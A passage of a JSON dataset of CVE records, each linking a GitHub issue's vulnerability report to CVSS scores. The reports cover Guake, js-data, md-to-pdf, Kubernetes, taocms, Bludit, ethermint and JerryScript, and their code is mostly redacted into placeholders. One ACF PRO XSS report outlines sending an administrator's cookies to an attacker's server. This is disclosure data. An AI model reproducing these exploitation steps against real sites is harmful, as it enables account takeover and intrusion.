        "Issue_Created_At": "2020-09-21T07:44:14Z",
        "description": "Security Issue: Exposure of sensitive function, malicious user can arbitrary command via an execute_command d bus method.. Describe the bug We understand that the usability of APITAG option. ( URLTAG BTW, it must not be exposure in d bus interfaces. Expected behavior guake must not exposure execute_command in d bus interfaces. Do not exposure execute_command in d bus interface. Actual behavior guake exposure execute_command in d bus interface. To Reproduce We can use gdbus to call an execute_command d bus method. CODETAG ERRORTAG cc. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2021-23567",
        "Issue_Url_old": "https://github.com/Marak/colors.js/issues/285",
        "Issue_Url_new": "https://github.com/marak/colors.js/issues/285",
        "Repo_new": "marak/colors.js",
        "Issue_Created_At": "2022-01-08T04:26:12Z",
        "description": "Zalgo issue with APITAG release. It's come to our attention that there is a zalgo bug in the APITAG release of colors. Please know we are working right now to fix the situation and will have a resolution shortly. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23574",
        "Issue_Url_old": "https://github.com/js-data/js-data/issues/576",
        "Issue_Url_new": "https://github.com/js-data/js-data/issues/576",
        "Repo_new": "js-data/js-data",
        "Issue_Created_At": "2021-05-08T22:09:49Z",
        "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23574",
        "Issue_Url_old": "https://github.com/js-data/js-data/issues/577",
        "Issue_Url_new": "https://github.com/js-data/js-data/issues/577",
        "Repo_new": "js-data/js-data",
        "Issue_Created_At": "2021-05-09T11:04:37Z",
        "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23639",
        "Issue_Url_old": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
        "Issue_Url_new": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
        "Repo_new": "simonhaenisch/md-to-pdf",
        "Issue_Created_At": "2021-09-22T07:38:13Z",
        "description": "Security: gray matter exposes front matter JS engine that leads to arbitrary code execution. The library gray matter URLTAG (used by md to pdf to parse front matter) exposes a JS engine by default, which essentially runs eval on the given Markdown. URLTAG Given that md to pdf is _only_ a Markdown to PDF library and looking at how other projects use it I think it is an undesirable _feature_ to be able to execute any arbitrary Javascript by anyone in control of the Markdown content. A possible fix would be to override gray matter's JS engine: APITAG APITAG CODETAG poc.js: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23803",
        "Issue_Url_old": "https://github.com/nette/latte/issues/279",
        "Issue_Url_new": "https://github.com/nette/latte/issues/279",
        "Repo_new": "nette/latte",
        "Issue_Created_At": "2021-11-21T07:06:14Z",
        "description": "There is a way to bypass APITAG Version NUMBERTAG Bug Description There is a way to bypass APITAG that will affect security. Steps To Reproduce ERRORTAG This will execute the system function. Expected Behavior Should throw an error not allowed by system function Possible Solution Use rigorous regular expression segmentation, or add more rigorous judgments in ERRORTAG function",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-24031",
        "Issue_Url_old": "https://github.com/facebook/zstd/issues/1630",
        "Issue_Url_new": "https://github.com/facebook/zstd/issues/1630",
        "Repo_new": "facebook/zstd",
        "Issue_Created_At": "2019-06-04T18:29:11Z",
        "description": "zstd adds read permissions to files while being compressed or uncompressed. While the final file mode is reflective of the input file, when compressing or uncompressing, the file can temporarily gain greater permissions than the input and potentially leading to security issues (especially if large files are being handled). Example: file has mode NUMBERTAG zstd file > APITAG has mode NUMBERTAG while compression is happening. APITAG happens with ERRORTAG and file )",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-24032",
        "Issue_Url_old": "https://github.com/facebook/zstd/issues/2491",
        "Issue_Url_new": "https://github.com/facebook/zstd/issues/2491",
        "Repo_new": "facebook/zstd",
        "Issue_Created_At": "2021-02-11T07:41:51Z",
        "description": "Race condition allows attacker to access world readable destination file. The patches for NUMBERTAG still create the file with the default umask, before chmod'ing down to NUMBERTAG so an attacker could still open it in the meantime. inotify can for instance help automating such an attack. zstd should either set the mode directly through open NUMBERTAG or use umask NUMBERTAG before creating the file. This is Debian bug CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2021-24241",
        "Issue_Url_old": "https://github.com/jdordonezn/Reflected-XSS-in-WordPress-for-ACF-PRO-before-5.9.1-plugin/issues/1",
        "Issue_Url_new": "https://github.com/jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin/issues/1",
        "Repo_new": "jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin",
        "Issue_Created_At": "2021-01-20T17:51:53Z",
        "description": "Reflected XSS in APITAG for APITAG Custom Fields PRO' plugin. APITAG allows APITAG site Scripting Reflected' in resource FILETAG , because the call an update page of Advanced Custom Fields PRO APITAG before NUMBERTAG plugin, enable injections of APITAG code. Steps to reproduce the vulnerability NUMBERTAG Add the payload XSS at the end of the url, so: URLTAG \"> APITAG alert('XSS') APITAG NUMBERTAG However, after of try some payloads I see the FILETAG NUMBERTAG I found a way to bypass this problem, in the request replace FILETAG NUMBERTAG Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example FILETAG NUMBERTAG Of course, previously must encode in URL the payload that calls previous script, so URLTAG APITAG FILETAG NUMBERTAG Send the payload and you will see two request, the first make a promise for sending the cookies and second is where the promise is executed. FILETAG NUMBERTAG Now the hacker has cookies of administrator user in the evil server. FILETAG Remediation I held messages with the dev team of Advanced Custom Fields, they fixed the vulnerability in the versi\u00f3n NUMBERTAG of ACF PRO, here is the report URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25313",
        "Issue_Url_old": "https://github.com/rancher/rancher/issues/31583",
        "Issue_Url_new": "https://github.com/rancher/rancher/issues/31583",
        "Repo_new": "rancher/rancher",
        "Issue_Created_At": "2021-03-04T05:15:24Z",
        "description": "PH NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25735",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/100096",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/100096",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-03-10T18:18:01Z",
        "description": "APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-25737",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/102106",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/102106",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-05-18T19:14:27Z",
        "description": "CVETAG : Holes in APITAG Validation Enable Host Network Hijack. Issue Details A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link local range, but the same validation was not performed on APITAG IPs. This issue has been rated Low ( PATHTAG URLTAG , and assigned CVETAG . Affected Component kube apiserver Affected Versions NUMBERTAG APITAG APITAG were not enabled by default in NUMBERTAG Fixed Versions This issue is fixed in the following versions NUMBERTAG Mitigation To mitigate this vulnerability without upgrading kube apiserver, you can create a validating admission webhook that prevents APITAG with endpoint addresses in the APITAG and APITAG ranges. If you have an existing admission policy mechanism (like OPA Gatekeeper) you can create a policy that enforces this restriction. Detection To detect whether this vulnerability has been exploited, you can list APITAG and check for endpoint addresses in the APITAG and APITAG ranges. If you find evidence that this vulnerability has been exploited, please contact security APITAG Acknowledgements This vulnerability was reported by John Howard of Google.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-25740",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/103675",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/103675",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-07-14T03:30:07Z",
        "description": "WIP.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2021-25741",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104980",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104980",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-09-13T20:58:56Z",
        "description": "PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25743",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101695",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101695",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-05-02T12:06:24Z",
        "description": "ANSI escape characters in Event JSON objects are not being filtered. It is a security issue, but after contacting security APITAG Tim and the team confirmed that they are comfortable posting it publicly. What happened: Kubernetes doesn't sanitize the 'message' field in the Event JSON objects. Notice that this is relevant only to JSON objects, not YAML objects. By creating new event, we can insert ANSI escape characters inside the \"message\" field, like: APITAG This an example of such JSON request: CODETAG The codes: APITAG > Clean the screen and history APITAG > Clean the entire screen and delete all lines saved in the scrollback buffer APITAG > Moves the cursor position to row NUMBERTAG column NUMBERTAG beginning). APITAG > Set the colors APITAG > Move the cursor forward NUMBERTAG steps APITAG > Set the text colors to white The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events. What you expected to happen: The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal). Or maybe some message that says that you can't use ANSI escape characters. How to reproduce it (as minimally and precisely as possible NUMBERTAG Run this code: CODETAG It will create a new event NUMBERTAG Run kubectl get events , you will see that the screen was clear, you will get a \"spoof\" message, and all the rest events or columns were gone. Anything else we need to know?: It might look like a low severity issue, but there are other variety of things we can do, from APITAG by using colors to hide all the events, changing the title of the terminal window, and spoof the data. It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism. ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVETAG ). Environment: Kubernetes version (use kubectl version ): CODETAG Cloud provider or hardware configuration: OS (e.g: APITAG ): ERRORTAG Kernel (e.g. ERRORTAG ): APITAG Install tools: minikube APITAG Network plugin and version (if this is a network related bug): Others: we also reproduced it in Kubernetes (not minikube) version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.0,
        "impactScore": 1.4,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2021-25745",
        "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8502",
        "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8502",
        "Repo_new": "kubernetes/ingress-nginx",
        "Issue_Created_At": "2022-04-22T16:18:21Z",
        "description": "Placeholder.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25746",
        "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8503",
        "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8503",
        "Repo_new": "kubernetes/ingress-nginx",
        "Issue_Created_At": "2022-04-22T16:18:27Z",
        "description": "Placeholder.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25783",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/5",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/5",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-01-05T06:47:47Z",
        "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a SQL blind injection vulnerability in the location of name: FILETAG FILETAG PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-25784",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/4",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/4",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-01-05T06:45:53Z",
        "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a blind SQL injection vulnerability in the location of id: FILETAG FILETAG FILETAG PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-25785",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/3",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/3",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-01-05T06:42:31Z",
        "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG Let's click \"add article\" on the left: URLTAG FILETAG Wow! FILETAG POC: FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-25808",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1298",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1298",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2021-01-05T10:41:41Z",
        "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG Hi,I found a code execution vulnerability in Bludit NUMBERTAG admin panel the path is PATHTAG NUMBERTAG Log in to the admin panel FILETAG NUMBERTAG Click the backups button FILETAG NUMBERTAG Making evil backup zip First download a backup FILETAG then use this zip to modify Place FILETAG file in path PATHTAG FILETAG FILETAG Package NUMBERTAG as FILETAG FILETAG Execute the script to generate the md5 for the .BLUDIT_BACKUP FILETAG NUMBERTAG upload the evil backup zip FILETAG NUMBERTAG Click the restore backup button FILETAG NUMBERTAG Access the evil file PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-25834",
        "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/686",
        "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/686",
        "Repo_new": "cosmos/ethermint",
        "Issue_Created_At": "2021-01-06T02:39:29Z",
        "description": "Weak noncecheck lead to replay of transactions. Vulnerability Overview: Since there is no explicit NUMBERTAG limit on the nonce check used by ethermint, this results in transactions passing the antehandler checksum as long as they are greater than the node\u2019s cached nonce. If the victim sends a very large nonce transaction, the attacker can replay the transaction. Details and Root Cause: First, we found some ground truths: As long as the APITAG is larger than the current node\u2019s cache nonce, it will pass both noncecheck. Signaturecheck uses the nonce field of the transaction itself, so transactions larger than the current cached nonce can still pass signaturecheck. Thus, if a msg have a large nonce,then it can be replaied. Steps to Exploit: Suppose the victim sends a nonce that is much larger than the current node\u2019s cache. An attacker can replay this transaction.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25835",
        "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/687",
        "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/687",
        "Repo_new": "cosmos/ethermint",
        "Issue_Created_At": "2021-01-06T03:01:00Z",
        "description": "Replay Tx on another Chain. Vulnerability Overview: Since ethermint uses the same type of APITAG for ethereum compatibility, a verified signature in ethereum is still valid in ethermint with the same msg content and APITAG which enables \"cross chain transaction replay\" attack etc. Details and Root Cause: First, we found some ground truths NUMBERTAG Both ethermint and ethereum have the same signature scheme NUMBERTAG User has the same public key and private key on ethermint and ethereum NUMBERTAG Different APITAG can be parsed to a same APITAG such as \"ethereum NUMBERTAG and \"erhermint NUMBERTAG Thus, if a msg successfully executed on ethereum of some APITAG say NUMBERTAG mainnet), then it can be replaied on ethermint of the same APITAG (with the nonce check passed), and vice versa. Steps to Exploit NUMBERTAG Suppose that there are two chains. One's APITAG is APITAG NUMBERTAG the other is APITAG APITAG victim have accounts on both chains with the same public key (private key NUMBERTAG The victim transfer NUMBERTAG eth to the attacker,and the victim's APITAG on APITAG NUMBERTAG is NUMBERTAG The victim's APITAG on APITAG NUMBERTAG is NUMBERTAG or less than APITAG the previously mentioned vulnerability can greatly reduce the difficulty of exploiting this vulnerability only need to meet the nonce of the replayed chain than the nonce of the replayed chain can be low NUMBERTAG The attacker replay the APITAG on APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25836",
        "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/667",
        "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/667",
        "Repo_new": "cosmos/ethermint",
        "Issue_Created_At": "2020-12-21T14:41:21Z",
        "description": "There may be dirty data when exec evm transaction with multi msgs. APITAG info:__ APITAG Ethermint commit, operating system name, and other relevant details] branch development APITAG info:__ APITAG gist of relevant config, logs, etc.] The storage data and code from APITAG are written to the keeper at the time of the handler and are cleared at the endblock stage. If there are NUMBERTAG msgs in a tx, in the APITAG (handler) stage, where msg1 executes successfully and msg2 fails, then all store data will be rolled back. However, the storage data in APITAG and the code are still Reserved, if another t NUMBERTAG is executed later in the APITAG phase, the dirty data from t NUMBERTAG will be used",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25863",
        "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/764",
        "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/764",
        "Repo_new": "open5gs/open5gs",
        "Issue_Created_At": "2021-01-15T11:49:05Z",
        "description": "Security flaw in default configuration of webui. Details The configuration of webui might result in the control panel being taken over by arbitrary user via default username and password. The lines of code below indicate that, if not specified, the server will listen on APITAG , which means the control panel could be accessed via WAN. CODETAG On APITAG , the code will create a default account APITAG , if there isn't any account specified in APITAG ERRORTAG Proof of Concept After doing a query via Zoomeye, a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters, several valid cases have been found: CODETAG FILETAG Suggestion The default account should never be assigned.",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-25864",
        "Issue_Url_old": "https://github.com/Foddy/node-red-contrib-huemagic/issues/217",
        "Issue_Url_new": "https://github.com/foddy/node-red-contrib-huemagic/issues/217",
        "Repo_new": "foddy/node-red-contrib-huemagic",
        "Issue_Created_At": "2021-01-17T11:35:47Z",
        "description": "Security bug in FILETAG . Describe the bug The APITAG API, errorly used in file APITAG , introduces a Path Traversal vulnerability. URLTAG APITAG Flow to Reproduce Since the path isn't protected by APITAG API. The attacker could fetch arbitrary file on the server. APITAG Expected behavior To fix this vulerability, option of the APITAG should be specified correctly. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25987",
        "Issue_Url_old": "https://github.com/hexojs/hexo/issues/4838",
        "Issue_Url_new": "https://github.com/hexojs/hexo/issues/4838",
        "Repo_new": "hexojs/hexo",
        "Issue_Created_At": "2021-12-14T19:12:15Z",
        "description": "Announcement: About CVETAG . Hexo team is already aware of the CVETAG , and we have already implemented a fix APITAG PR URLTAG However, we will not release a minor version. The fix will be included in the next major version of Hexo (which will be NUMBERTAG The fix (which will enable HTML entities escaping by default) is considered as a breaking change and we notice that it could break many current themes. Also, you should be aware that, Hexo is only a static site generator. It only generates static HTML from the source from your local computer (or your server). It is impossible for anyone other than you to modify your hexo theme or your blog post without physical access to your computer or login to your server. That's to say, in order for anyone to perform an attack based on the CVETAG , the hacker will have to hack into your computer or your server to modify your blog posts . But if that really happens (your local computer or server being compromised), the hacker can basically do anything anyway. If you host the source code of your Hexo site on a server and use some kind of web editor (like APITAG ), it is possible for hackers to modify your post through such a web editor (without login to your server). We recommend you to use some kind of authentication to protect your web editor (which you should always have even without this CVE. You don't want anybody to modify your post, right?). APITAG we mentioned earlier has a built in username & password configuration in the first day (so you will not be affected if you use a strong password). In short, it is not a Stored XSS or a Reflect XSS. It is a Self XSS APITAG XSS yourself, or a hacker to hack into your computer or server to perform the XSS attack). And your website will work flawlessly and sound even without we release a fix.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 2.7,
        "exploitabilityScore": 1.5
    },
    {
        "CVE_ID": "CVE-2021-26194",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4445",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4445",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-01-11T13:28:31Z",
        "description": "heap use after free in ecma_is_lexical_environment. APITAG revision fdaacde6 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26195",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4442",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4442",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-01-11T13:04:23Z",
        "description": "heap buffer overflow in lexer_parse_number. APITAG revision fdaacde Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26197",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4403",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4403",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-01-02T14:31:59Z",
        "description": "SEGV in APITAG APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26198",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4402",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4402",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-01-02T14:29:48Z",
        "description": "SEVG in ecma_deref_bigint. APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-26199",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4056",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4056",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-07-25T14:58:50Z",
        "description": "heap use after free in ecma_bytecode_ref. APITAG revision da5b NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
